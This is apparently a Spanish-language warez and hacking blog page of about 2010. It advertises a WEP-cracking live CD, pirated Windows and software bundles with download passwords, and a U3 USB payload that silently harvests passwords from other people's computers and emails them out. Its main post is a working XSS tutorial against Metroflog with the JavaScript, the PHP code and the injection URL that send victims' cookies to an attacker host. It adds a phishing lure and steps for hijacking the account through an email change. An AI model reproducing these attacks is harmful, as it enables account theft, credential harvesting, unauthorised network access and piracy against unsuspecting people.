Ultima version Wireless Hacking Live-CD (FBI version) 2010





















        











Live cd de hacking inalámbrico, también utilizado por el FBI

Linux Live-CD - OS corre desde el CD - 635 mb -. Iso
-- También utilizado por el FBI…

WEP Hacking - la siguiente generación

Esta version es para TODOS los sistemas excepto para sistemas con tarjeta Inalambrica Intel B/G(IPW2200). Live CD contiene herramientas para vulnerar un Access Point WLAN/inalambrica. En otras palabras podras entrar a redes inalambricas y aprovechar la linea de internet. Este programa ha sido usado por el FBI.

Solo para conocimiento educativo, el uso que se le de a este CD es bajo responsabilidad del usuario, no me hago responsable del uso indebido que a este se le de.
WEP es un esquema de cifrado, basado en el cifrado RC-4, que está disponible en todo los productos inalambricos 802.11a, b y del tipo g. WEP utiliza un sistema de bits llamando una llave para revolver la información en los data frames(encriptacion), mientras sale del punto de acceso al adaptador receptor, entonces descifra en el receptor el mensaje encriptado.

En ambos lados deben tener la misma llave de WEP, que es generalmente un total de 64 o 128 pbits de largo. Los 24 números de bits semi-aleatorio llamados en un vector de inicialización (IV), son parte de la llave, así que la llave WEP de 64 bits contiene realmente solamente 40 bits de cifrado fuerte mientras que un una llave de 128 bits tiene 104. El IV se coloca en la cabecera del FRAME cifrado, y es transmitido en texto plano.

Tradicionalmente, el vulnerar llaves WEP ha sido un proceso lento y aburrido. Un atacante tendría que capturar centenares de millares o millones de paquetes proceso que podría tomar horas o aún días, dependiendo del volumen de tráfico que pasa sobre la red inalambrica. Después de que bastantes paquetes fueran capturados, un programa que vulnere llaves WEP tal como Aircrack sería utilizado para encontrar la llave WEP.

El verano pasado, cuando apareció la primera herramienta de última generación que vulneraban llaves WEP. Esta generación actual utiliza una combinación de técnicas estadísticas centradas en un único IVs capturado y además de ataques de diccionario por fuerza bruta para romper llaves WEP de 128 Bits en minutos en vez de horas. Mientras que discute el agente especial observado, no importa si utilizas llaves WEP de 128 Bits, tú eres vulnerable!

Instrucciones básicas:
1.- Botea desde el cd
2.- Descifra la claveWEP
3.- Anotala
4.- Reinicia Windows Nuevamente
5.- Solo resta conectarte a internet con la clave ya hackeada.


RapidShare: 1-Click Webhosting
RapidShare: 1-Click Webhosting
RapidShare: 1-Click Webhosting
RapidShare: 1-Click Webhosting
RapidShare: 1-Click Webhosting
RapidShare: 1-Click Webhosting
RapidShare: 1-Click Webhosting

Password: www.territoriowarez.com

HERRAMIENTA PARA SABER KIEN TE VISITA EN HI5 MF O FACEBOOK DELUXE

 
Hola para todos aquellos que les  da curiosidad de quien es la persona que mas mira tu muro en facebook, fotolog, hi 5 y etc??les traigo un regalo!!!!

siiii, ahora con esta herramienta podremos mirar:
1) quien nos elimino de facebook, hi5, fotolog, etc
2) quien es la persona que mas entra a nuestro facebook a mirar.
3) a quien mas miramos nosotros.
4) quien no quieremos que vea nuestro facebook, fotolog etc

quien quiere mas???? este programa funciona perfectooo!!! esta testeado y lo estaban vendiendo pero ya lo hicieron libre!! 



http://www.megaupload.com/?d=EH8X1PQZ


saludos, aprovechen mientras pueden porque quitare el link de descarga dentro de un rato.. no es conveniente que todos tengan esta hermosura de herramienta 

MSN SKIN MAKER

Hace algunos días, se hizo pública la noticia de que Windows Live Messenger superó los 300 millones de usuarios activos, y es que claro, con los buenos servicios prestados, no tiene mucha competencia que se le compare.

Si tu estás entre ese inmenso número de usuarios si no sabes crear los skins en vb o algun tipo de programacion, entonces este artículo probablemente será de tu interés, ya que mediante lo que hoy te vamos a enseñar, podrás modificar y personalizar aún más la apariencia de tu MSN, todo sin molestarte mucho.



Lo único que necesitas es descargarte el programa MSN Skin Maker y dedicar unos pocos minutos de tu tiempo para crear skins para MSN.

La modalidad de uso de este programa es realmente muy simple, dentro de su interfaz podrás ir determinando diferentes imágenes de fondo para cada pantalla de tu MSN, pudiendo poner imágenes para la ventana principal, la de conversaciones, la de la lista de contactos y algunas más.

Como requisitos, primero debemos decir que para usar a MSN Skin Maker se necesita tener el Microsoft . NET Framework 3.5 instalado, y para la correcta implementación de los skins para MSN se necesita tener el Messenger Plus! instalado.

Por otra parte, cabe destacar que todo es totalmente gratuito y que puedes descargar MSN Skin Maker libremente desde la web del autor, sin registrarte ni nada.

DESCARGA:

http://deskmodders.forumcommunity.net/?t=35172309


NOTA; nos encontramos con la molestia de que el programa viene en portugues u.u pero bueno no  es algo que nos impida entenderle  solo seguimos los pasos (crear fondo para cuando iniciemos sesion, fondo de las converasiones, etc) es facil de entender espero les guste ..

Pidgin 2.6.6 [Un cliente para todas tus cuentas]

Si estás cansado de la pesadez y la gran cantidad de publicidad de Windows Live Messenger o de no poder hablar con personas que utilizan otros programas de mensajería, ¿Por qué no pruebas Pidgin?

Pidgin (antes conocido como Gaim) es un programa para chatear con personas que utilicen diferentes programas de chat. Es decir, podrás hablar a la vez con personas que utilicen Windows Live Messenger, ICQ, Yahoo! IM, clientes Jabber, Google Talk, etc.

En cuanto a sus funciones, Pidgin permite el envío de archivos, tiene un aviso de "tu amigo está escribiendo...", emoticonos, notificaciones, diferentes estados y es capaz de ejecutar un programa o cambiar de estado dependiendo de si uno de tus contactos se conecta.

Pidgin es un buen programa para no tener que usar más de un cliente de mensajería instantánea.
Pidgin soporta los siguientes formatos:

AIM, Bonjour, Gadu-Gadu, Google Talk, Groupwise, ICQ, IRC, MSN. MySpaceIM, QQ, SILC, SIMPLE, Sametime, XMPP, Yahoo!, Zephyr 


ALGUNAS CAPTURAS

*

*

*
 

 


Descargar:

http://depositfiles.com/files/blenjxxik

CONVIRTIENDO USB SMART EN HERRAMIENTA HACKING

Convierte tu U3 USB Smart en una poderosa herramienta hacking La ejecución automática de la U3 podría usarse con fines diversos al almacenamiento de información en la misma, decidí buscar en Internet y afirmativament e servía como una herramienta hacking.







Si tienes una SanDisk U3, aquí tienes cómo instalarlo:
Cómo se instala?

1. Descarga GonZor=- Payload V2.0 2.
2. Descarga Universal Customizer
3. Descomprime el Universal Customizen en C:\Universal_Customizer.
4. Descomprime el -=GonZor=- Payload V2.0 en C:\Payload.
5. Copia el archivo U3CUSTOM.ISO de C:\Payload y pégalo en C:\Universal_Customizer\BIN reemplazando el antiguo.
6. Ejecuta C:\Universal_Customizer\Universal_Customizer.exe y conecta tu memoria al PC.
- Selecciona Accept y dale clic en Next.
- Cierra cualquier aplicación U3 o cualquier programa que tenga acceso a esta.
- Selecciona un password para hacer un backup de tu información de la memoria (la va a formatear).
- Clic en Next y empezará a grabar tu infomación de la memoria al disco duro, espera a que la memoria U3 culmine su trabajo. - Ya todo debe estar completo, desconecta tu memoria y conéctala de nuevo.
7. Copia C:\Payload\SBconfig.exe en tu memoria USB U3.
8. Ejecuta SBconfig.exe desde tu memoria.
- Selecciona las opciones de la izquierda que te gustaría usar, recomiendo habilitar todas.
- Crea una cuenta de GMAIL nueva para usar el HackSaw.
- Cliquea en Update Config para actualizar tu configuración, debe aparecer un mensaje de confirmación.
- Para habilitar o deshabilitar el software haz clic en Turn U3 Launchpad On y Off respectivament e.
9. Ahora debes tener instalado -=GonZor=- en tu U3!
Podrás sacar passwords de cualquier equipo Windows XP o Vista sólo si está en modo Administrador.

Te recomiendo una vez finalices estos pasos y actives el software, no vuelvas a meter la memoria en tu equipo, de lo contrario quedará instalado HackSaw en tu PC y enviará toda la información de tu memoria al correo que usaste anteriormente, robándote mucho ancho de banda.

Cada vez que pongas la memoria en algún equipo asegúrate de deshabilitar el Launchpad (Turn Launchpad Off), para que puedas meterlo en tu equipo.

Los logs (contraseñas, historiales, datos.) quedarán guardados en tu memoria U3 Smart exactamente en: %pendrive%:\System\Logs\%NOMBRE_DEL_PC_HACKEADO%
siendo %pendrive%: la letra de unidad de tu memoria  y listo espero les guste el post no olvien comentar en el minichat a los lammer ke vengan de ardidos chsm y mejor no digan nada a los demas gracias por visitar el blog gracias a ustedes seguira creciendo..

WIFI HACK 2010 ALL IN ONE




Esta vez le traemos el mejor software para hackear las redes WiFi de 2010. El compilado incluye potente software en detecciуn y cifrado de redes ideal para Hackear Redes Wi-Fi. La recopilación incluye el software de cifrado de gran alcance en la detección de red y es ideal para cortar las redes WiFi. Descargar Programas para Hackear Redes WiFi Full Gratis. Descargar programas para hackear las redes WiFi gratis completo.








Este AiO contiene:
Herramientas de Windows 1
• Wireshark
• AirSnare
• WirelessKeyView
• Monster Wifi
• NetStumbler
• Easy WiFi Radar
• SmartSniff
• Ettercap
• WinPcap
• CommView


Herramientas de Windows 2
• Nmap
• WirelessMon
• PocketWarrior
• Inssider
• RemoteAnyWhere
• PmoniPacketMon
• ApTools
• WiFiFoFum
• Advanced Port Scanner
• NetSurveyor


Retroceder
• Enlace de descarga para BackTrack 4 Pre Release
• Enlace de descarga para BackTrack 4 Beta Release
• Enlace de descarga para BackTrack 3 Imagen VmWare
• Enlace de descarga para BackTrack 3
• Enlace de descarga para BackTrack 3 USB Versión


PDF's y tutoriales
• Hacking Wireless Networks
• WEP y WPA WiFi
• Wifi Hacking
• Hacking Asus WL520gU
• BackTrack PDF
• WiFi avanzada Fuzzing
• Wifi Seguridad
• Wireless Sniffing Wireshark
• Wireless Hacking Tools


Bono de Software
• Herramientas de Red
• WepGen
• Cantennator
• AnchorFree
• Caín y Abel
• Wifi Drivers
• Bruto
• VMware Keygen
• LanHelper





http://hotfile.com/dl/27542760/6ee11f2/b1u3eyes.AIO.Wifi.rar.html

Nuevo_TEU Todos los Win7 + Programas 2010





Formato DVD5 , 4 Dvds , 32/64 bits
Testeado en XP/VISTA/SEVEN





Este trabajo se acaba de ACTUALIZAR con las ultimas versiones!!

El dvd1


Es booteable para poder instalar la versión de seven
q mas te convenga según tus necesidades !!

Contiene las utilidades mas importantes y q no deben
faltar en tu equipo !!

Analizado con kis , sin reportes de bichos !!


CONTENIDO DVD1 :
DVD1
--------------------------------------
SISTEMAS OPERATIVOS
(Version RTM Final , Todos en Español)

--------------------------------------
Windows 7 Starter x86
Windows 7 HomeBasic x86
Windows 7 HomeBasic x64
Windows 7 HomePremium x86
Windows 7 HomePremium x64
Windows 7 Business x86
Windows 7 Business x64
Windows 7 Professional x86
Windows 7 Professional x64
Windows 7 Ultimate x86
Windows 7 Ultimate x64
Windows 7 Enterprise x86
Windows 7 Enterprise x64
-------------------------
UTILIDADES DE SISTEMA
-------------------------
WinRar 3.91 Coprporativo x86
WinRar 3.91 Coprporativo x64
UltraISO 9.3.5.2716
TuneUp Utilities 2010 9.0.2020.2
AutoPlay Media Studio 7.5
Your Uninstaller! Pro 7.0.2010.13
Driver Genius Pro 9
Everest Ultimate Edition 5.30.1900
Diskeeper 2009 x86
Diskeeper 2009 x64
Descargar


http://lix.in/-76d1ce
PASSWORD : fbb


Aqui les dejo un Respaldo DLC para asi no tengan problemas cuando los link se caiguen


http://lix.in/-6f3289




El dvd2 :





UTILIDADES DE SISTEMA
-------------------------
UNLOCKER 1.8.7
DAMN NFO Viewer 2.10
Recover My Files Professional.Edition.v4.4.8.578
Adobe Flash Player 10
IDM UltraEdit 15.20.0.1020
JAVA Version 6 Update 17
Passware Kit Enterprise 9.3 Build 815
Hide Folder 2009 3.3.17.601

-----------------
Imagen y Diseño
-----------------

Macromedia Studio 8
- Macromedia Contribute 3
- Macromedia Dreamweaver 8
- Macromedia Fireworks 8
- Macromedia Flash 8
- Macromedia FlashPaper 2
- Macromedia Freehand MX 2004
- Manuales Macromedia Studio (Español)
Adobe Photoshop Lightroom 2.6
Adobe Photoshop CS4 Extended 11.0.0
-Actualizacion a 11.0.1
Photoshop CS4 Lite
Adobe Photoshop CS3 Extended 10.0 Lite
Adobe Photoshop CS3 Extended 10.0 Proper
SnagIt 9.1.3 Build 19
VSO Image Resizer 3.0.0.30 Business
PhotoFiltre Studio X 10.2.1
Picasa 3.6.0 Build 95.25
WebSite Evolution X5 v8.0.11

-----------
MultiMedia
-----------

PowerDVD Ultra 9.0.0.2201 (Activado)
Winamp Pro 5.571 Build 2810
BSplayer PRO 2.51.1022
K-Lite Codec Pack 5.6.1
KMPlayer 2.9.3.1428
AIMP v2.60 Build 530
RealPlayer v11.1.2 Build 6.0.14.954 Gold (Activado)
JetAudio. 8.0.0.510 Plus

--------
Internet
--------

Live Messenger 2009
Mesenger PLUS
Mozilla Firefox 3.5.7
Yahoo Messenger 10.0.0.1102
IncrediMail 2 v6.03 Build 4436
FlashGet 1.9.6.1073
Skype 4.1.0.179
JDownloader 0.9579
Emule 49C |* Exclusive *|

----------
Grabacion
----------

Nero 9.4.13.2 Ultra Edition 2009
Ashampoo Burning Studio 9.20
Acronis True Image Home 2010
VSO ConvertXToDVD 4.0.9.322a
DVDFab Platinum 6.2.1.8
Burnaware Professional 2.4.0
DVD Shrink 3.2.0.16
DVD Decrypter 3.5.4.0
Norton Ghost 15.0.0.35659

Descargar:


http://lix.in/-6a3290


PASSWORD : fbb




DVD3
 

Grabacion
---------

Alcohol 120% Retail 1.9.8.7612
Slysoft AnyDVD HD 6.6.0.9
Slysoft CloneDVD 2.9.2.7
Magic ISO Maker 5.5 Build 0281
Tera Copy Pro 2.1
Ashampoo Cover Studio 2.01
Paragon Backup & Recovery 10.0 x86
Paragon Backup & Recovery 10.0 x64
Symantec Backup Exec System Recovery 2010 v9.0.0.35656.


---------
SEGURIDAD
---------

ESET NOD32 AntiVirus v4.0.474 Business Edition 32Bits
ESET NOD32 AntiVirus v4.0.474 Business Edition 64Bits
ESET NOD32 AntiVirus v4.0.474 Standard Edition 32Bits
ESET NOD32 AntiVirus v4.0.474 Standard Edition 64Bits
ESET Smart Security v4.0.474 Business Edition 32Bits
ESET Smart Security v4.0.474 Business Edition 64Bits
ESET Smart Security v4.0.474 Standard Edition 32Bits
ESET Smart Security v4.0.474 Standard Edition 64Bits
Kaspersky Anti-Virus 2010 9.0.0.736
Kaspersky Internet Security 2010 9.0.0.736
Avira Premium Security Suite 9.0.0.387
AVG Internet Security 9.0.716.1803
Norton AntiVirus 2010 17.0.0.136
Malwarebytes'Anti-Malware 1.44
Lavasoft Ad-Aware Pro Internet Security 2010 v8.1

-------------
Audio y Video
-------------

Sony Sound Forge Pro 10.0
Camtasia Studio v6.0.3 Build 928
Xilisoft Video Converter Ultimate v5.1.26.1231
TMPGEnc XPress Retail v4.7.4.299
Sony Vegas Pro 9.0c x86
Sony Vegas Pro 9.0c x64
QuickTime 7.6.5
DVD Audio Extractor 4.5.5
MediaCoder v0.7.2.4590

---------
OFIMATICA
---------

Microsoft Office 2007 SP2 Suite
Adobe Reader 9.3
Foxit PDF Reader Pro 3.1.4
PDF Suite 9.0.5.22
Universal Document Converter 5.0
Foxit PDF Creator v3.0.1 Build 0109
Able2Extract Professional v6.0
Elcomsoft Advanced PDF Password Recovery v5.0 Professional

Descargar:


http://lix.in/-704d3c


PASSWORD : fbb


dvd 4




Descargar:


http://lix.in/-74e151


PASSWORD : fbb


Aqui el JDownloader v0.9.579 para descargar los DLC


http://lix.in/-73586c


FUENTE: http://www.incaliber.org/showthread.php?t=3704

GTA IV (EXTENDED VERSION)

El GTA IV, finalmente anunciado para PC
 el anuncio oficial del lanzamiento de esta versión del GTA IV no estás solo: hay muchos otros que también prefieren el teclado y ratón a todos los otros mandos, que modifican el juego por diferentes razones o que descargan modificaciones o juegos salvados. Esto se debe a que estas cosas no están disponibles en las consolas o son difíciles de realizar. A pesar de la felicidad por el anuncio, hay quienes resienten el hecho de que el juego llegue  a la venerada PC.
El juego fue anunciado por el fundador de Rockstar Games, Sam Houser y además de decir que el GTA IV “Se ve y juega fantástico en la PC”, anunció una expansión de las opciones multijugador que no fue detallada.
La posibilidad de enfrentarse a otros jugadores humanos también es una característica muy esperada y hay quien argumenta que funciona mejor en el ordenador que en las consolas. Los modos conocidos son 5, con algunas variaciones que prometen horas de diversión para quien disfrute jugando contra una inteligencia superior a la de los “bots” del juego.

aqui el video de intro 





                                                                                        



LINK(S) DESCARGA
http://webprod13.megashares.com/index.php?d01=0d28624&sq=&d01go=1&fln=/101-gta4.iso
http://webprod3.megashares.com/index.php?d01=e8cf7f6&sq=&d01go=1&fln=/101-gta4.dvd 


recuerden copien el link y pegenlo en su navegador 

COMO ROBAR PASS DE METROFLOG ?

.:: Introduccion ::..
Pues este sera al primer tutorial que pondre aqui en mi blog, y al parecer sera uno muy bueno no necesitaremos de programas ni nada ajeno al tutorial simplemente seguir correctamente las instrucciones simplemente pura info jeje disfrutenlo. Si se ponen a buscar en internet (llamese San Google) acerca de como hackear Metroflog, dudo que encuentren algo verdaderamente bueno, como esto que les voy a poner. Si llegan a encontrar algo sera o un Scam o que existe la vulnerabilidad XSS, que es la que ya habia publicado desde el año pasado.
El Scam se vuelve una tecnica complicada comparada contra esto que les voy a poner aqui. Ademas ya la gente no es tan tonta como para caer en los Scam (ahahaha, es broma, la neta hay muchisima todavia xD).
Esta tecnica que voy a explicar aprovecha la vulnerabilidad XSS, que es un error que se encuentra un muchas otras paginas, asi que el procedimiento, funciona para cualquier otra pagina con el mismo error, por lo que lo que les voy a poner no es ningun truco nuevo, simplemente intento dejar claro, como se llevaria a cabo en el caso de Metroflog.
..:: Entendiendo la Vulnerabilidad XSS ::..
Antes de empezar a explicar como aprovechar la vulnerabilidad, entendamos como es. El XSS segun Wikipeda es “un tipo de inseguridad informática o agujero de seguridad basado en la explotación de vulnerabilidades del sistema de validación de HTML incrustado.” No manchen, se escucha chido, pero no se si se entendio, asi que tratare de explicarlo con mis palabras.
El XSS es un error de programacion en paginas web, a traves del cual se puede hacer una inyeccion de codigo en HTML o Javascript, a traves de una variable que utilice la misma pagina web. Por la misma naturaleza de esos lenguajes de programacion, sabemos que no pueden afectar directamente al servidor donde se encuentra alojada esa pagina Web, y sabemos que solo se ejecutaran de manera local en donde hayamos hecho la inyeccion.
En el caso de Metroflog, la variable que es vulnerable es la variable “pos”. Esta variable se vuelve visible para nosotros cuando damos en click en una de las fotos pequeñas que aparecen arriba en los metroflogs, que vienen siendo las fotos anteriores. Si entramos directamente al metroflog, no veremos esta variable en nuestro explorador.
Hasta ahi, al parecer no es una vulnerabilidad grave, pero creanme, lo es. Y se vuelve mas grave, cuando en la pagina web se manejan coockies (no pienso explicar que son las coockies), y por lo general manejamos coockies en las webs donde nos podemos registrar (hotmail, gmail, yahoo, metroflog, blogspot, una infinidad de paginas, etc).
..:: El ingenio del ataque XSS ::..
Bien, ahora viene la parte ingeniosa de este ataque: si el codigo inyectado solo puede ser HTML o Javascript, y solo es de manera local ¿Como Hackeo un Metroflog con eso?. Bien veamos la cadenita.
Alguien alguna vez me dijo que a este metodo de analisis se le llamaba “Reduccion a lo absurdo” y funciona de esta forma:
Quiero llegar a Hackear un metro, ese es el objetivo final, y puedo lograrlo de dos formas: o conociendo la contraseña o conociendo los valores de todas las coockies. Este metodo esta encaminado a las coockies y entonces asi lo explicare, aunque de todos modos mas adelante explico como sacar la contraseña tmb (h).
Bien, ya se que obteniendo las coockies, hackeare ese metro, pero ¿Como obtengo las cookies?. Pues con codigo Javascript es posible acceder a esos valores, a traves de document.cookie que es una como variable que guarda los valores de las cookies.
Hasta aqui como que ya va agarrando forma. Pero si accedo a document.cookie inyectando codigo en mi computadora, pues solo vere mis coockies. Y si hago (que no es facil, pero mas abajo explico el metodo) que alguien mas inyecte ese codigo en su computadora, pues solo lo veran ellos =O. Este es un nuevo problema, ¿Como le hago para que esa persona inyecte ese codigo en su computadora, pero que yo tambien pueda ver el valor de esas coockies?
Este nuevo dilema lo podriamos resolver, si de alguna forma ejecutaramos PHP tambien, ya que PHP si se ejecuta directamente en el servidor, de esa forma, el valor de esas cookies las podriamos guardar en otro archivo que se encuentre en el mismo servidor. Ahora un nuevo dilema ¿Como ejecuto PHP desde Javascript? ¿Es posible?
La respuesta es “Si!” xD. Utilizando una pequeña redireccion en javascript, podemos linkear a un codigo en PHP, y a traves del metodo GET pasarlo a alguna variable que este contenida en nuestro archivo PHP y asi almacenarlo en un nuevo archivo, al cual nosotros tenemos acceso. Esa fue la rapida explicacion del ingenio de esta tecnica, que no es elite ni h4×0r en ningun sentido, cabe destacar eso.
..:: ¿Que se necesita para poner en practica esta tecnica? ::..
Pues lo que necesitamos para hackear un metro es lo siguiente:
* Metroflog de nuestra victima
* Su cuenta de correo (Esto es opcional, ahorita explico por que, aunque tener el correo es la mejor opcion)
* Un archivo en javascript
* Un archivo en PHP
* Hosting para almacenar los archivos.
..:: Aplicando nuestra tecnica de manera detallada::..
Bien, primero una ves entendida la explicacion, vayamos a lo bueno: los codigos. Estos codigos no son nuevos, ni mucho menos, de hecho es muy facil encontrarlos en muchisimas paginas, el hecho es saberlos utilizar bien.
El codigo en javascript es una sola linea de codigo y seria el siguiente:
window.location=’http://www.tu-host.com/roba_cookies.php?cookie=’+document.cookie
Esa linea de codigo la guardamos con extension .js, y le damos el nombre que sea, en este caso yo la llamare “redireccion.js”. Si nos damos cuenta, utiliza la funcion windows.location, que sirve para direccionar; ahi nos esta mandando al archivo php que se llama “roba_cookies.php” y que tiene una variable llamada coockies que toma el valor de “document.cookie”, es decir las cookies de metroflog de nuestra victima =).
NOTA: el codigo del siguiente archivo php debe llevar en la primera linea de codigo el “<” seguido de “?”, solo que no se lo puse ya que al parecer se interpreta. Ahora veamos como seria el codigo del archivo “roba_cookies.php”:

$cookies = $_GET['cookies'];
$guardando = fopen(“cookies.txt”,”a”);
$ip = $_SERVER['REMOTE_ADDR'];
$hora = date(“G:H:s”);
fwrite($guardando, “IP: $ip \n”);
fwrite($guardando, “Hora: $hora \n”);
fwrite($guardando, “Valores de las cookies: \n”);
fwrite($guardando, “$cookies \n”);
fclose($guardando);
?>

¿Lo explico? Ok, lo hare linea por linea. Primero a traves del metodo GET le da el valor a $cookies con el valor de document.coockie. Despues ejecuta la accion de abrir y poder escribir en un archivo llamado cookies.txt. Obtiene la IP de nuestra victima. Obtiene la Hora actual del servidor. Escribe la IP. Escribe la Hora. Escribe “Valores de las cookies:”. Escribe el valor de las cookies.
Bien. ya tenemos los codigos que necesitamos. Pero ahora necesitamos algo mas, el link que realiza la inyeccion del codigo javascript. Voy a utilizar la pagina de alguien desconocido como ejemplo, aunque no le haremos daño a su metro, solo sera para que vean como funcionan las inyecciones.
Usemos el metro de Claudia xD:
Y veamos que exite el link
Si nos fijamos, la variable “pos” es la fecha de publicacion de esa foto 22 de noviembre del 2008. Bueno, eso no nos interesa, haha, solo era un comentario. Existe otra variable llamada nf, que la verdad no nos ayuda ni nos perjudica.
Veamos con un ejemplo como funciona esta inyeccion: http://www.metroflog.com/dangerously-cute/20081122/?pos=%22%3E%3Cscript%3Ealert(/Owned%20by%20mx0x/)%3C/script%3E
Si damos click, en el link anterior, nos abre el metro y nos salta un mensaje. Justamente eso hace la funcion alert de javascript. Es solo una forma de comprobar la vulnerabilidad. Ahora vayamos al link que nos interesa, la Poisoned URL, haha, bueno, la URL que nos direccion al codigo en javascript.
http://www.metroflog.com/dangerously-cute/20081122/?pos=%22%3E%3Cscript src=”http://www.tu-host.com/redireccion.js”>
Va de nuevo, dando click en el link anterior, nos hace llegar al metro, pero rapidamente, nos redireccion al archivo en javascript, que nuevamente, nos manda al archivo php que guarda los valores de las coockies en un archivo de texto, al cual tenemos acceso.
El archivo de texto que almacena las cookies guardaria cada registro de la siguiente manera:
IP: 127.0.0.1
Hora: 8:08:49
Valores de las cookies:
__utma=18306213.2086185802.1223149270.1231378158.1231397360.68; __utmz=18306213.1231378158.67.30….
..:: ¿Como le hago para hacer que la otra persona entre en ese link tan raro? ::..
Es facil jo jo. Puede ser de mil formas, pero una que se me ocurre es la siguiente. Cuando alguien sube una foto a un metro, algunas de las veces, se spamea el correo de sus contactos con un correo que dice “Te invito a ver mi Metroflog” o algo asi. Entonces podemos enviar un correo de esos, donde diga lo mismo, pero modificando el link, de modo que parezca normal, pero que al darle click nos mande al link con el codigo.
El link podria ser como este: http://www.metroflog.com/dangerously-cute A simple vista parece que solo nos manda al metro, pero al darle click nos ejecute el codigo. Muy poca gente, se daria cuenta de que en la barra de abajo del explorador aparece la direccion completa. Bien esa es una forma, pero se pueden ingeniar muchas otras, como por ejemplo cambiar los caracteres por su valor en ascii, ocultando los links.
..:: Ya tengo los valores de las cookies ¿Y ahora? ::..
Pues lo que sigue es crearse la cookie, para eso recomiendo usar FireFox y el addon de Cookie Editor (xD?). De esa forma sera tan facil como editar un campo de texto por cada cookie. Con el editor veremos listada cada variable, al darle click a una de ella, nos mostrara su valor en la parte que dice content. Solo sera cuestion de darle al boton de Edit y cambiar ese valor, por los valores almacenados por el archivo PHP. Se debe de ver algo mas o menos como se muestra en la siguiente imagen:

Una vez editadas todas las cookies con los valores guardados, refrescamos el metroflog, y automaticamente estaremos logeados como ese usuario xD. Y sin necesidad de conocer su contraseña, esto es muy importante. Ahora ya podremos hacer lo que sea: subir fotos, borrar comentarios, cambiar colores, postear en otros metros con ese usuario, etc.
Este es un metro que ownee desde el año pasado, cuando andaba checando esta vulnerabilidad, aqui les dejo el screen:
http://i155.photobucket.com/albums/s292/FhUrER/ownedtifaa.jpg
..:: Ya tengo las cookies y ya hice maldades, pero quiero mas ¿Como obtengo la contraseña? ::..
Metroflog tiene otro detalle, que podria considerarse como error. Una vez logeado como el usuario podremos acceder al panel, pero no podremos cambiar la contraseña, ya que nos pide la contraseña actual, la cual no conocemos x_x. Sin embargo, podemos cambiar el correo, jo jo. Cambiamos el correo por uno nuestro, para realizar este cambio no nos pide la contraseña, solo una pequeña comprobacion que es enviada a nuestro correo.
Una vez cambiado el correo, le damos en Log Out o en Salir. Y vamos a www.metroflog.com y le damos en Olvidaste tu contraseña? (xD). Ahi nos pide el e-mail, que ya es el nuestro, le damos en Enviar y listo!! la contraseña nos llegara asi de facilmente a nuestro correo =) Ahora ya tenemos totalmente owneada la cuenta de metroflog, ya que asi ya podemos cambiar la contraseña.
..:: Comentarios finales ::..
Pues solo quiero comentar que “no hagas, lo que no te gustaria que te hicieran, aunque si estas seguro de que no te lo pueden hacer, entonces hazlo xD”. Este metodo, como se habran dado cuenta es basicamente hacer click sobre un link y listo, tu metroflog sera owneado. Asi que tengan cuidado!, fijense en donde hacen click, porque en una de esas te tumban el metro. Por eso no usen esas cosas, usen Blogs, y recomiendo Blogspot, la verdad. Luego hare un post de MetroFlog VS Blogspot y veran que paliza!! hahaha. Bien, este es un verdadero metodo de como hackear una cuenta de MetroFlog, espero haber sido lo suficientemente explicito, espero que les sea util y les haya gustado.
NOTA: Ya lo habia dicho, esto no es elite, no te vuelve hacker. De hecho tal vez no debi haber usado la palabra “hack”, simplemente es ownear una cuenta espero les alla servido.

INFECTANDO POR MEDIO DE LINK

BUENO AKI LES DEJO UN VIDEO HACERCA DE COMO HAKEAR POR MEDIO DE LINK SI ESTAN ARTOS DE ESPERAR UN MOMENTO O DE CASI CASI ARRODIYARSE ANTE LAS VICTIMAS PARA KE LOS ASEPTEN POR MEDIO DE MSN BUENO AKI UN NUEVO METODO MENOS EMBARAZOSO Y BIEN EXPLIKADO ESPERO LES SIRVA